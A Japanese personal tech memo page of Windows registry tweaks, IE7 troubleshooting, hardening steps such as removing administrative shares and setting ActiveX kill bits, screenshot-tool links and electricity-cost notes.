|可能性が高いと思われますので、近日中に改良をさせて
|いただく所存でございます。
エラー時にパスとエラーの行が出てたから、出さない方が良いんじゃない?
って書いたつもりだったんだけど。。。
Webアプリケーションに潜むセキュリティホール
第4回 エラーメッセージの危険性
http://www.atmarkit.co.jp/fsecurity/rensai/webhole04/webhole01.html
アクセスログ
URL='/w00tw00t.at.ISC.SANS.DFind:)'
だれかが、Web の脆弱性スキャナ使って調査してる、、、って事?
http://isc.sans.org/diary.php?storyid=900
BIOS のファーム上げたらブルースクリーン…
--------------------------------
イベントの種類: エラー
イベント ソース: System Error
イベント カテゴリ: (102)
イベント ID: 1003
説明:
エラー コード 000000fc、
パラメータ1 f78aea0c、
パラメータ2 1f276963,
パラメータ3 f78ae978、
パラメータ4 00000000.
--------------------------------
エラー コード 000000fc、
パラメータ1 f59c2954、
パラメータ2 1cccf963,
パラメータ3 f59c28c0、
パラメータ4 00000000.
--------------------------------
戻しても、ブルースクリーン…orz
原因は BIOS の Execute Disable を有効にしたのが原因。
The factory default Setting is ON
って書いてあって、OFF になってたらから設定したんだった・・・
バッファオーバーフロー対応してる CPU じゃなかったから、かな?
ちなみに、DELL の SC420(安売りしてた時に手に入れた)
オーバーレイに対応してなくて困ってた訳ですが…
実は、録画、録音がメインで( Web 公開はおまけみたいなもんだったり )
PCI Express x1 ビデオカード 商品・価格 一覧
http://www.coneco.net/list_spec/01507010/13343.html
ELSA NVIDIA Quadro NVS 285 を注文中・・・(まだ発売されてなさげ)
x64 ドライバも出るといいなぁ。
Microsoft Windows Server 2003 Scalable Networking Pack のリリース
http://support.microsoft.com/kb/912222/ja
Xeon 5100番台 のプロセッサとか、TCP/IP OffLoad Engine 搭載してるやつ向け。
デル、第9世代PowerEdgeサーバを出荷開始──新技術を積極採用
http://www.computerworld.jp/topics/Vtl/42441.html
http://www1.jp.dell.com/content/topics/segtopic.aspx/pressoffice/2006/060620?c=jp&l=jp&s=corp
この辺りのサーバを購入した場合は、上記の Networking Pack 導入で
劇的に反応が良くなるのではないでしょうか。。。
Some problems occur after installing Windows Server 2003 SP2 (KB945977)
http://support.microsoft.com/kb/945977
SP2 をインストール後に色々不具合が出るようです。NIC のドライバを新しくせよ。
デスクトップに Windows のバージョンを表示させるには
HKEY_CURRENT_USER\Control Panel\Desktop
値の名前 : PaintDesktopVersion
データの種類 : REG_DWORD
データの値 : 1
参考
デスクトップにバージョンを表示する / デジタルARENA
http://arena.nikkeibp.co.jp/tec/winxp/20060713/117656/
Web のサムネイル化
クラフテック、画面キャプチャー用の「Capture It! ツールバー」を無償公開
http://internet.watch.impress.co.jp/cda/news/2006/11/20/13997.html
PHARMACY
http://members.jcom.home.ne.jp/illegal/homeWork/PHARMACY/
PHARMACY (Vector)
http://www.vector.co.jp/soft/winnt/net/se327655.html
html2imgについて
http://www2u.biglobe.ne.jp/~MAS/soft/html2img/index.html
スクロールが必要なWebページの全体像をキャプチャーできる「html2img」
http://www.forest.impress.co.jp/article/2002/07/22/html2img.html
html2img (Vector)
http://www.vector.co.jp/soft/win95/art/se248113.html
FastStone Screen Capture - A tiny, versatile and flexible Screen Capture Tool
http://www.faststone.org/FSCaptureDetail.htm
スクロールが必要な面積の広い画面を1枚絵に撮影できる「FastStone Capture」
http://www.forest.impress.co.jp/article/2006/10/02/fscapture.html
消費リソース零!『キャプラ』
http://homepage1.nifty.com/chappy/lib/libcawr.htm
画面キャプチャー直後の処理を指定できる「消費リソース零!『キャプラ』」
http://www.forest.impress.co.jp/article/2002/06/12/capwrite.html
webnail2
http://fw.moongift.jp/intro/i-1023-catid-9.html
公式サイト
http://www.hirax.net/pukiwiki/pukiwiki.php?cmd=read&page=webnail2
url2bmp
http://www.forest.impress.co.jp/article/2004/01/27/url2bmp.html
公式サイト
http://www.pixel-technology.com/freeware/url2bmp/english/
URL2JPEG - オープンソースWEBページサムネールツール
http://www.syboos.jp/html/bookmark/detail/20080416101800353.html
公式サイト
http://www.url2jpeg.com/
SimpleAPI
http://simpleapi.net/
はてなスクリーンショット
http://screenshot.hatena.ne.jp/
サーバー側でWEBサイトのスクリーンキャプチャ、サムネイルを作成する方法
http://jamz.jp/tech/2006/03/website-screen-capture-on-server.html
http://jamz.jp/tech/2006/06/links-website-screen-capture.html
Webプロフェッショナルの必須スキル 〜 一夜にしてWebページのキャプチャを極める完全ガイド
http://dragon.jp/column/archives/miyanaga_060601.html
第1回 Google画像検索アプリを作ろう
http://www.atmarkit.co.jp/fdotnet/practprog/wisearch01/wisearch01_01.html
SimpleAPI での表示。
自作する場合は、このあたりかな。
Web ページデータのダウンロードについて
http://www.microsoft.com/japan/msdn/vbasic/migration/tips/WebClient/
デスクトップの画像キャプチャ方法について
http://www.microsoft.com/japan/msdn/vbasic/migration/tips/CopyFromScreen/
Internet ExplorerをFoxProでHOOKする
http://www2u.biglobe.ne.jp/~objxbase/fontsetting/HookIEbyVFP.htm
Webページをビットマップで取得する
http://homepage1.nifty.com/yasunari/VB/VB2005/WebBrowserDrawToBitmap.htm
Capture Entire Web Page
http://www.codeproject.com/KB/vb/WebCapture.aspx
画面をキャプチャする
http://dobon.net/vb/dotnet/graphics/screencapture.html
SOAP
ネイティブ XML Web サービス要求をリッスンするためのサーバーの設定
http://msdn2.microsoft.com/ja-jp/library/ms191310.aspx
・エンドポイントの作成
CREATE ENDPOINT (Transact-SQL)
http://msdn2.microsoft.com/ja-jp/library/ms181591.aspx
Http.sys の使用による URL 名前空間の予約
http://msdn2.microsoft.com/ja-jp/library/ms188682.aspx
SQL Server 2005 HTTP エンドポイントを作成,権限設定サンプル
http://blogs.sqlpassj.org/yoshihirokawabata/archive/2006/01/26/15909.aspx
HTTP 名前空間の予約
http://msdn2.microsoft.com/ja-jp/library/ms190614.aspx
ネイティブ XML Web サービス要求を送信する場合のサンプル アプリケーション
http://msdn2.microsoft.com/ja-jp/library/ms189955.aspx
HttpCfg.exe HTTP.SYS 名前空間予約などができるサポートツール
http://blogs.sqlpassj.org/yoshihirokawabata/archive/2006/01/25/15902.aspx
一覧
httpcfg query urlacl
削除
httpcfg delete urlacl /u http://localhost:8080/
SSL に使用する証明書の構成
http://msdn2.microsoft.com/ja-jp/library/ms186362.aspx
httpcfg query ssl
WSDL の使用
http://msdn2.microsoft.com/ja-JP/library/ms175476.aspx
PDS メソッドを呼び出すための SOAP の使用法
http://msdn.microsoft.com/library/ja/default.asp?url=/library/ja/jppjsdk/html/pdsUsingSOAP.asp
Reporting Services のインストール方法に関するトピック
http://msdn2.microsoft.com/ja-jp/library/ms143757.aspx
管理共有を削除
作った覚えの無い共有が幾つか出来上がってる訳ですが、、、、
管理共有は共有名を知っているユーザか Administrator 権限がある人のみしかアクセス出来ません。
セキュリティ上問題になることは滅多に在りませんが Windows Server をインターネットに公開
している場合は管理共有を消しておきましょうね。ノートもかな。
C$ や D$ ルート パーティションやボリュームは、ドライブ文字に $ 記号を付加した名前で共有。
ADMIN$ コンピュータのリモート管理時に使用されるリソース
PRINT$ プリンタのリモート管理時に使用されるリソース
FAX$ FAX 通信時に FAX クライアントによって使用されるサーバー上の共有フォルダ
NETLOGON 隠し共有リソースではありませんが、特別な管理用共有
SYSVOL 隠し共有リソースではありませんが、特別な管理用共有
IPC$ プログラム間で通信を行うために必要な名前付きパイプを共有するリソース。削除できない。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
値の名前 : AutoShareServer(サーバー OS の場合)
値の名前 : AutoShareWks (クライアントOS の場合)
データの種類 : REG_DWORD
データの値 : 0
上記キーを作成後、Server サービスの再起動
net stop server
net start server
※ Windows 2008 Server の場合は Srv, Srv2 サービスも同時に再起動が必要です。
net stop srvnet
net stop srvnet < 2回停止コマンドを実行すること。
net start server
参考
Windows Server 2003 で管理用共有を削除する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;816524
Windows Server 2003 でレジストリ エディタを使用して管理用共有を復元する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;816113
クライアント コンピュータで隠し共有または管理用共有を作成および削除する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;314984
When you modify the AutoShareServer registry value on a Windows Server 2008-based computer, you are prompted to restart the computer for the change to take effect
http://support.microsoft.com/kb/954413
フォルダ−アクセス権マップツール(無償)
http://www.microsoft.com/japan/windowsserver2003/activedirectory/ACL.mspx
役に立つかも。
ついでに、ファイルのコピーと移動でのアクセス権の違いにも注意。
コピー:コピー先フォルダの NTFS アクセス権が付与(別ドライブへ移動もこっち)
移動 :移動元フォルダの NTFS アクセス権が維持(同一ドライブの場合)
(ある共有ディレクトリだけを、、、に書き足しても良かったかな。)
IE7 でタブが出てこない場合の復活方法。(未確認)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : ClassicShell
データの種類 : REG_DWORD
データの値 : 0
・IEの設定リセットを行ってみる
・Yahoo ツールバーを削除してみる
試してみたけど、タブ出てきませんねぇ…何が原因なんだろ。
The Desktop tab does not appear in the Display Properties dialog box in Windows XP
http://support.microsoft.com/kb/922370
デスクトップのプロパティタブじゃん。
IE7 日本語版でましたね。http://www.microsoft.com/japan/windows/ie/default.mspx
結局入れ替えても、タブ表示されないわけで、、、
何が悪さしてるんだろう。
Internet Explorer 7 (IE7) 不具合情報(FAQ)
http://teamcroud.fc2web.com/ie7bate2.htm
Internet Explorer 7 (IE7) に関するトラブルや解決策など
http://bbs.hotfix.jp/ShowPost.aspx?PostID=6087
IE 7正式版を試す:ダウンロードしたばかりのIE 7日本語版をチェックしてみた
http://www.itmedia.co.jp/bizid/articles/0611/02/news121.html
何やってもダメな訳で…
えーと、新しいユーザを作成して、そのユーザでインストールしたらタブ出てきた。
が、以前のユーザでログインするとタブ出ず…最適化ツールとか、そのあたりが影響してそうだ。。。
Windows XP または Windows Server 2003 にすぐ開始するとき、 Internet Explorer 7 が終了します。
http://support.microsoft.com/kb/928427
Phishing フィルタ が Internet Explorer 7 に Web ページの内容を評価するので、非常に緩やかにコンピュータが応答することがあります。
http://support.microsoft.com/kb/928089
Windows XP SP2 ベースまたは Windows Vista-based のコンピュータで Internet Explorer 7 を使用すると、既定のシステム アイコンがインターネット ショートカット ファイルが表示されます。
http://support.microsoft.com/kb/930426
Internet Explorer 7 をアップグレードすると、 Outlook Express でハイパーリンクは機能しません。
http://support.microsoft.com/kb/929867
Internet Explorer 7 からファイル名に日本語を含むファイルをダウンロードすると、ファイル名の一部が変更されることがある
http://support.microsoft.com/kb/930938
Windows シェルから Internet Explorer 7 の分離
http://support.microsoft.com/kb/928675
Internet Explorer 7 がインストールされている場合に、Windows XP のインストールの修復を実行する方法
http://support.microsoft.com/kb/917964
問題が Internet Explorer で発生し、閉じます。
http://support.microsoft.com/kb/931324
Internet Explorer 7 の XML コンテンツを含む Web ページを更新すると、 Iexplore.exe プロセスでメモリ使用量が増加します。
http://support.microsoft.com/kb/929861
Internet Explorer 7 の Service Pack 2 で Windows XP を実行しているコンピュータでポップアップ ウィンドウを閉じるとき、アクセス違反が発生することがあります。
http://support.microsoft.com/kb/931678
Windows XP を実行しているコンピュータにファイルをダウンロードするために、 Windows Internet Explorer 7 を使用することができません。
http://support.microsoft.com/kb/932823
IME の入力が受け付けられなくなったり、終了時にエラー出たりしますねぇ...
Webフォルダの動きもなんだか変だし...
Windows Vista を実行しているコンピュータにおいてネットワーク経由でファイルのコピーを実施すると 通信速度が遅いことがある
http://support.microsoft.com/kb/932170
レジストリを操作してカスタマイズ。上の件があったもんで(笑
「マイコンピュータ」表示名をログインユーザ名に変更
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
値の名前 : LocalizedString
データの種類 : REG_EXPAND_SZ
データの値 : %USERNAME% (ユーザ名を表示する場合) %COMPUTERNAME% (コンピュータ名)
環境変数は、コマンドプロンプト から SET コマンドで確認出来ます。
セットアップCDの参照場所の変更「プログラムの追加と削除」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
値の名前 : SourcePath
データの種類 : REG_SZ
データの値 : 参照先の保存先パス
デバイスドライバやネットワーク関連
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
値の名前 : SourcePath
データの種類 : REG_SZ
データの値 : 参照先の保存先パス
アプリケーションの保存先を「Program Files」から変更
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
値の名前 : ProgramFilesDir
データの種類 : REG_SZ
データの値 : プログラムの保存先フォルダ
値の名前 : CommonFilesDir
データの種類 : REG_SZ
データの値 : プログラムの共有ファイルの保存先フォルダ
マウスが重なったウインドを自動アクティブ化
HKEY_CURRENT_USER\Control Panel\Desktop
値の名前 : UserPreferencesMask
データの種類 : REG_BINARY
データの値 : FF,3E,00,00
FF:B0でアニメーション無効化
3E:マウスポインタの影有効 00 にすると無効化
00:?
00:?
値の名前 : ActiveWindowTracking
データの種類 : REG_DWORD
データの値 : 0(無効) 1(有効)
値の名前 : ActiveWndTrkTimeout
データの種類 : REG_DWORD
データの値 : アクティブになるまでの時間(ミリ秒)
デスクトップを別プロセスで実行
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
値の名前 : DesktopProcess
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(プロセス分離)
http://arena.nikkeibp.co.jp/tec/winxp/20040406/108355/
エスクプローラを別プロセスで実行
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
値の名前 : SeparateProcess
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(プロセス分離)
http://www.atmarkit.co.jp/fsecurity/rensai/securitytips/040explorer.html
ゴミ箱のプロパティを非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
値の名前 : NoPropertiesRecycleBin
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
前回開いていたフォルダを表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
値の名前 : PersisBrowsers
データの種類 : REG_DWORD
データの値 : 0(無効) 1(有効)
エクスプローラのツリーを自動展開
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
値の名前 : FriendlyTree
データの種類 : REG_DWORD
データの値 : 0(無効) 1(有効)
ポップアップバルーン無効化
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
値の名前 : ShowInfoTip
データの種類 : REG_DWORD
データの値 : 1(デフォルト) 0(ヒント表示なし)
新たにインストールしたプログラムの通知を無効化
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
値の名前 : Start_NotifyNewApps
データの種類 : REG_DWORD
データの値 : 1(デフォルト) 0(通知なし)
クリーンアップウィザード無効化
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
値の名前 : NoRun
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
クラシックスタイル
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
値の名前 : SetVisualStyle
データの種類 : REG_SZ
データの値 : 空にしておく。
スタートメニューからログオフ非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : StartMenuLogoff
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
スタートメニューからシャットダウン非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoClose
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
スタートメニューから「すべてのプログラム」を非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoStartMenuMorePrograms
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
スタートメニューから「よく使われるプログラム一覧」を非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoStartMenuMFUprogramsList
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
スタートメニューから「インターネット、電子メール」アイコンを非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoStartMenuPinnedList
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
スタートメニューからログオン中のユーザ名を非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoUserNameInStartMenu
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(非表示)
エクスプローラでのファイルの並び順を変更
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoStrCmpLogical
データの種類 : REG_DWORD
データの値 : 0(デフォルト 数字順) 1(文字コード順)
タスクバ上のツールバー非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoToolbarsOnTaskbar
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
タスクバーのコンテキストメニュー(マウスの右クリック)非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoTrayContextMenu
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
コンテキストメニュー(マウスの右クリック)非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoViewContextMenu
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
画面のプロパティから「Web」タブを非表示
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : ClassicShell
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
アクティブデスクトップを無効化
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoActiveDesktop
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
USB ポートが無反応になる現象を回避
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USB
値の名前 : DisableSelectiveSuspend
データの種類 : REG_DWORD
データの値 : 0(デフォルト) 1(無効化)
USB のサスペンド機能を無効にすることで競合することを回避。
このレジストリを修正すると USB ルートハブのプロパティを開いた時に、電源の管理タブが表示されなくなります。
Windows XP または Windows Server 2003 を実行するデスクトップ コンピューターに外付けの USB ハブ経由でデバイスを接続しようとすると接続が確立されないことがある
http://support.microsoft.com/kb/902274
ログオン画面のセキュリティを強化する
http://pc.nikkeibp.co.jp/article/NPC/20060524/238899/
マイコンピュータのドライブを非表示にする
http://pc.nikkeibp.co.jp/article/NPC/20060524/238879/
デスクトップ操作を禁止する
http://pc.nikkeibp.co.jp/article/NPC/20060424/236096/
埋め込みe-Words
〜 あなたのWebページに「関連用語」を 〜
http://e-words.jp/p/s-embed.html
張ってみた。
らじろぐ が一部で流行っているらしい。。。
キャロル↓に変更 & TOP ページに貼り付け。
Live Searchを使って他人とつながるブログパーツ、マイクロソフトが公開
http://pc.nikkeibp.co.jp/article/NEWS/20070201/260377/?ST=pc_news
米Yahoo!、バックリンク数を表示するバッジ(ツール)を公開
http://www.sem-r.com/15/20070131000708.html
地域特定技術 【ジオターゲティング】
http://e-words.jp/w/E59CB0E59F9FE789B9E5AE9AE68A80E8A193.html
どうやって調べてるんでしょうね、、、
google trends が地域出てますね。アドワーズ広告もなのかな?
http://www.google.com/trends
電話番号から特定するものは、以前に作ってみたけど。。。
こっちの下の方にも少し情報を載せてます。
ActiveX コントロールが Internet Explorer で実行されないように Kill Bit を立てる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
値の名前 : Compatibility Flags
データの種類 : REG_DWORD
データの値 : 1024(0x00000400)
※CLSID は該当する ActiveX コントロールのクラス識別子を記述
参考
Internet Explorer で ActiveX コントロールの動作を停止する方法
http://support.microsoft.com/kb/240797
Windowsに新しいセキュリティ・ホール,任意のプログラムを実行される恐れあり
http://itpro.nikkeibp.co.jp/article/NEWS/20061028/252053/
Visual Studioにセキュリティ・ホール,Webアクセスで被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20061101/252377/
適当な名前.reg として保存、実行すれば反映される物を書きました。
--ここから
Windows Registry Editor Version 5.00
'***********************************************************************
' Internet Explorer で ActiveX コントロールの動作を停止する方法
' http://support.microsoft.com/kb/240797
'***********************************************************************
' セキュリティ アドバイザリ (927892) XML コアサービスの脆弱性により、リモートでコードが実行される
' http://www.microsoft.com/japan/technet/security/advisory/927892.mspx
' Microsoft XML コアサービスの脆弱性により、リモートでコードが実行される (928088) (MS06-071)
' http://www.microsoft.com/japan/technet/security/bulletin/ms06-071.mspx
' で対応
'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{88d969c5-f192-11d4-a65f-0040963251e5}]
'"Compatibility Flags"=dword:00000400
'***********************************************************************
' セキュリティ アドバイザリ (927709) Visual Studio 2005 の脆弱性により、リモートでコードが実行される
' http://www.microsoft.com/japan/technet/security/advisory/927709.mspx
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}]
"Compatibility Flags"=dword:00000400
'***********************************************************************
' Windowsに新しいセキュリティ・ホール,任意のプログラムを実行される恐れあり
' http://itpro.nikkeibp.co.jp/article/NEWS/20061028/252053/
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000514-0000-0010-8000-00AA006D2EA4}]
"Compatibility Flags"=dword:00000400
'***********************************************************************
' セキュリティ アドバイザリ (925444) Microsoft DirectAnimation パスの ActiveX コントロールの脆弱性により、リモートでコードが実行される
' http://www.microsoft.com/japan/technet/security/advisory/925444.mspx
' Internet Explorer 用の累積的なセキュリティ更新プログラム (922760) (MS06-067)
' http://www.microsoft.com/japan/technet/security/bulletin/ms06-067.mspx
' で対応( Kill Bit が設定されます )
'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
'"Compatibility Flags"=dword:00000400
'***********************************************************************
' Internet Explorer ”Print Table of Links” Cross-Zone Scripting - Advisories
' http://secunia.com/advisories/30141/
' PhotoStockPlus Uploader Tool ActiveX stack buffer overflows
' http://www.kb.cert.org/vuls/id/406937
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E48BB416-C578-4A62-84C9-5E3389ABE5FC}]
"Compatibility Flags"=dword:00000400
'***********************************************************************
--ここまで
これもあったね。
SecuniaがIE7の脆弱性を早くも警告、IE6にも存在する“mhtml:”の脆弱性
http://internet.watch.impress.co.jp/cda/news/2006/10/19/13676.html
Secunia がテストを作成しています。
http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/
放置されている残りの脆弱性は下記サイトで
Zero-Day Tracker
http://research.eeye.com/html/alerts/zeroday/index.html
eEye、ゼロデイ脆弱性情報サイトを開設
http://www.itmedia.co.jp/enterprise/articles/0612/07/news031.html
IE7 をインストールした場合、イベントビューアに「Internet Explorer」が追加
されていますが、専用のサービス等を組み込んだ場合にここに登録する方法です。
組み込み方として、「Internet Explorer」を追加する手順を記します。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
キーの名前 : Internet Explorer
登録後、最新の情報に更新(F5)を押すと配下に以下の値が追加れさています。
値の名前 : (既定)
値の型 : REG_SZ
値 : 値なし
表示名
値の名前 : Sources
値の型 : REG_MULTI_SZ
値 : Internet Explorer
この時点で、イベント ビューアに表示されるようになり、表示名の変更やログサイズの設定が可能。
ここでログサイズの設定すると、レジストリに2つキーが追加されます。
イベントを上書きするまでの経過日数
値の名前 : Retenion
値の型 : REG_DWORD
値 : 604800(秒)デフォルトで 7日
最大ログサイズ
値の名前 : MaxSize
値の型 : REG_DWORD
値 : 524288(Byte)デフォルトで 512KB
ログの保存場所の設定(キーは追加されませんので追加します)
値の名前 : File
値の型 : REG_MULTI_SZ
値 : %SystemRoot%\system32\config\IE.Evt
コマンドからイベントを記録してみる(XP/2003) ※ここから先は未確認。
eventcreate.exe
/T :SUCCESS(成功), ERROR(エラー), WARNING(警告), INFORMATION(情報)
/SO :ソース名
/ID :1 〜 1000
/L :書き込み先のログの指定(レジストリ登録名を指定)
アプリケーションログ:APPLICATION
システムログ:SYSTEM
セキュリティログ:SECURITY
/D :説明
例)
\>eventcreate.exe /T SUCCESS /SO IEApp /ID 90 /L "Internet Explorer" /D "IE7 を起動しました。"
スプリクトからは、イベントログにしか書けないようなので
アプリケーション・イベント・ログの作成
http://www.atmarkit.co.jp/fwin2k/operation/wsh07/wsh07_01.html
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "eventcreate.exe /T SUCCESS /SO IEApp /ID 90 /L ""Internet Explorer"" /D ""IE7 を起動しました。"""
こんな感じかな。
この他に、特定のイベントをトリガーとして任意のコマンドラインを実行する「eventtriggers.exe」もある。
eventtriggers.exe を使ってアカウントがロックアウトされたタイミング(イベントID539)で管理者に通知するには
\>eventtriggers.exe /create /tr "lockout" /l security /eid 539 /tk "net send administrator アカウントロックアウトが発生しました。"
強化されたコマンドライン・ツール(前編)
http://www.atmarkit.co.jp/fwin2k/xp_feature/013commandtool/commandtool.html
コマンド ラインからイベント ログを管理する
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/ServerHelp/3208b2f6-30c4-4bc4-a7ef-829148a34e30.mspx?mfr=true
はてなブックマーク > 人気エントリー > www.netdive.jp
http://b.hatena.ne.jp/entrylist?url=http%3A%2F%2Fwww.netdive.jp%2F&sort=count
ブックマークされてたようで…
情報に間違いがあれば教えてくださいませ。。。
「ボットネットは“目立たない”ように工夫を凝らす」---IIJの齋藤氏
http://itpro.nikkeibp.co.jp/article/NEWS/20061116/254007/?ST=print
|「近接伝播」も最近の特徴であるという。別のコンピュータに感染を広げるボットの場合,
|ランダムに感染先を探すのではなく,現在感染しているマシンの近傍のIPアドレスを持つ
|マシンを狙う。同一ネットワーク内で感染を広げれば,「(ボットのトラフィックが)
|バックボーンをまたがないのでISPは気づきにくい。
9月末辺りから、いっぱい飛んできますねぇ…
ウイルス作者の新手口,Googleマップで感染マシンの場所を突き止める
http://itpro.nikkeibp.co.jp/article/USNEWS/20061116/253918/
局地的にスパイされるわけですよね、、、
各国の政府機関が欲しがるネットワークが構築されつつあるのかな…
無償のWebグループウエア「GroupBoard Workspace 2007」が備える新機能
http://itpro.nikkeibp.co.jp/article/COLUMN/20061205/256024/
窓の杜 - 【NEWS】手軽に導入できるフリーで多機能なWebグループウェア「GSMoN」
http://www.forest.impress.co.jp/article/2007/03/01/gsmon.html
触ってみるかねぇ…
とりあえず
Apache (apache_2.2.3-win32-x86-no_ssl.msi)
http://ftp.kddilabs.jp/infosystems/apache/httpd/binaries/win32/
ActivePerl
http://www.activestate.com/store/activeperl
ついでに
Ruby on Rails
http://rubyforge.org/frs/?group_id=904
電気代
気にした事無かったんだけど。。。
V ボルト(電圧)
A アンペア(電流)
VA ボルトアンペア(皮相電力)
W ワット(電力) 電力(W)=電圧(V)×電流(A)×力率
Wh ワットアワー(電力量) 電力量(Wh)=電力(W)×使用時間(h)
中部電力(2006.12.10の時点)( http://www.chuden.co.jp/tetsuduki/home/basic/dentou.html )
120kWhまで \16.01
120kWhをこえ300kWhまで \20.08
300kWhをこえる \21.51
プレステ3を1日動かしていたら
0.38kW * 24h * \21.51 = 196.1712
一ヶ月で 約5900円(196.1712 * 30 = 5885.136)
TVの場合は
52型の液晶アクオスが約322W、57型で約528W
42型ビエラが345W、50型で455W、58型で590W、103型は1450W(これはコンセントやばそうだ)
24 時間動かしているサーバを仮想化しないと!
そういえば PLC が始まったけど、家電製品のノイズ対策ってどうなん?
AV 機器はデリケートだから、クリアな音・はっきりした映像を求めるなら
電源周のノイズ(電波や電磁波)を減らす事が重要と言われているけど。。。
そういう対策がしてある電源コード(オーディオ系の電源コードを調べれば見つかります)もあります。
PS3 は次世代音声フォーマットに対応(TrueHD、DD+)出力するAVアンプがまだ無いみたいだけど...
将来的に PLC ノイズ(配電線内を 4〜28 MHzの高周波が流れる事になる)の対策が必要になるのかも。
モバイル向けCore 2 Duo搭載で高性能と省エネを見事に両立!
http://journal.mycom.co.jp/ad/2006/sycom/review/silentmaster_duo2.html
PCの消費電力を最適化するフリーソフト「LocalCooling」
http://www.gizmodo.jp/2007/10/pclocalcooling.html
「PS3の消費電力は冷蔵庫の5倍」調査結果
http://wiredvision.jp/news/200806/2008060422.html
無線LAN共有サービスの「FON」が日本上陸--ルータの無償配布も
http://japan.cnet.com/news/com/story/0,2000056021,20337376,00.htm
最近のメーカ製 PC ってメディアサーバみたいなの実装してますよね。
guest アカウントを有効にしちゃったりしてる訳ですが、、、
こういったサービスを利用する場合は、administrator アカウントの名前を変更する
さらには guest、administrator アカウントは無効にしておきたいですが、、、
(NTLMv2 認証のみの設定にしてあれば、ある程度は防げるとは思いますが・・・)
何人の人が理解できてるんでしょうかね。
脅威とその対策 第 5 章 : セキュリティ オプション
http://www.microsoft.com/japan/technet/security/topics/serversecurity/tcg/tcgch05n.mspx
今使っているルータの下にぶら下げてるだけの人は、やばい香りがします。。。
スカイプは最近どうなんでしょうね、、、
常駐しているだけで感染する脆弱性があったみたいですけど。。。
他人のネットタダ乗り“無銭”LANが秋葉原でバカ売れ
http://www.zakzak.co.jp/digi-mono/goods/news/20091203/gds0912031648001-n2.htm
